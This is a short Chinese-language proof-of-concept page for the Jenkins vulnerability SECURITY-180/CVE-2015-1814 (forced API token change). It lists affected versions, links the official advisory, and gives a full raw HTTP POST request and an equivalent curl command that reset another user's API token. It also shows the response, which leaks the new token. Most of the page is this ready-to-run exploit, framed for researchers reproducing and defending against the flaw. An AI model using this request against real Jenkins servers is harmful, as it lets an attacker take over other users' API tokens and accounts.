本文详细分析了Jenkins的SECURITY-180/CVE-2015-1814漏洞,提供了PoC代码和验证方法,适用于安全研究人员和DevOps工程师进行漏洞复现和防护。
Jenkins - SECURITY-180/CVE-2015-1814 PoC
强制API令牌更改漏洞
SECURITY-180/CVE-2015-1814
官方公告:https://jenkins.io/security/advisory/2015-03-23/#security-180cve-2015-1814-forced-api-token-change
受影响版本
- 所有Jenkins版本 <= 1.605
- 所有LTS版本 <= 1.596.1
PoC验证环境
测试对象:Jenkins 1.605
HTTP请求示例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
POST /user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken HTTP/1.1
Host: 10.0.0.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://10.0.0.160:8080/asynchPeople/
Content-Length: 8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
=user2
|
cURL版本
1
2
3
4
|
curl -i -s -k -X $'POST' \
-H $'Host: 10.0.0.160' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0' -H $'Accept: text/javascript, text/html, application/xml, text/xml, */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'X-Prototype-Version: 1.7' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Referer: https://10.0.0.160/asynchPeople/' -H $'Content-Length: 8' -H $'Connection: keep-alive' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' \
--data-binary $'=user2\x0d\x0a' \
$'http://10.0.0.160:8080/user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken'
|
响应输出
1
2
3
4
5
6
7
|
HTTP/1.1 200 OK
script: document.getElementById('apiToken').value='29a087f1e29620e105385b7599bffd20'
Content-Type: text/html;charset=UTF-8
Content-Length: 19
Server: Jetty(winstone-2.8)
<div>Updated</div>
|
验证新令牌有效性
成功获取新API令牌后,需验证其是否有效。